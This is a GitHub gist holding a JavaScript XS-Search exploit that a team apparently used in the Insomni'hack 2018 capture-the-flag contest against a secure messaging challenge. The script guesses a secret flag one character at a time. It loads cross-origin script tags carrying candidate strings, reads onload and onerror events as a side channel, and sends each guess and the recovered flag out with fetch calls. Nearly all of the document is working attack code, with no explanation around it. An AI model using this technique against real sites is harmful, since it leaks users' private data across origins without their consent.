Exploit used during Insomni'hack 2018 for team int3pids.
Last active
March 25, 2018 16:34
-
-
Save sirdarckcat/8aed2e82eb29c421576bf724a3524ebf to your computer and use it in GitHub Desktop.
XS-Search Exploit for Secure Messaging Service
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
var alphabet="abcdefghijklmnopqrstuvwxyz0123456789{} !?&|/@+-_" | |
var FLAG=""; | |
var i=0; | |
var result="loading"; | |
var check=""; | |
var valid=true; | |
function reset(){ | |
document.open(); | |
result="load"; | |
valid=false; | |
onerror=function(){result="error";valid=true;} | |
} | |
function next(){ | |
fetch("?result="+result+"&flag="+escape(FLAG)); | |
if(valid){FLAG=check;i=0;} | |
if(i>=alphabet.length){fetch('?done='+encodeURIComponent(FLAG));addFriend();} | |
reset(); | |
check=FLAG+alphabet.charAt(i++); | |
document.write('<script src="http://sms.insomni.hack/messages.php?from=jingle_bell1337&content='+encodeURIComponent(check)+'&direction=0" onload="next()"><\/script>'); | |
} | |
next(); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment